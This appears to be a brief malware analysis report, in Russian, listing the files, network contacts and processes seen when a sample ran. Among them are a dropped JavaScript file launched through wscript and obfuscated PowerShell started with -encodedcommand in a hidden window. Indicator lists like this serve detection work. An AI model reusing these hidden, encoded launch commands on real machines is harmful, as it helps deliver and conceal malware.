Техническая информация
- %TEMP%\mz_etilqs_xxssah8y9ppjel8
- %TEMP%\mz_etilqs_0lyhnjg2ociwynn
- %TEMP%\mz_etilqs_ozd51yhszxt3iz9
- %TEMP%\mz_etilqs_p1sv5vuphqmyhun
- %TEMP%\mz_etilqs_tomd3ycipwiue7g
- %ALLUSERSPROFILE%\squintierquatrefoil.js
- %TEMP%\mz_etilqs_cg10hwwitx9c3jq
- '35.##1.9.150':443
- DNS ASK fe########alog-cdn.prod.mozaws.net
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\SquintierQuatrefoil.js" PropitiationImbute Intellectualized tiltupRoisters SalutationlessViragos
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\SquintierQuatrefoil.js" PropitiationImbute Intellectualized tiltupRoisters SalutationlessViragos (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABTAGUAeAB0AG8AbABlAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBZAFEAQgB1AEEASABVAEEAWQBRAEIAeQBBAEgAawBBAFQAdwBCAHoAQQBHAE0AQQBhAFEAQgBzAEEA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABTAGUAeAB0AG8AbABlAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBZAFEAQgB1AEEASABVAEEAWQBRAEIAeQBBAEgAawBBAFQAdwBCAHoAQQBHAE0AQQBhAFEAQgBzAEEA...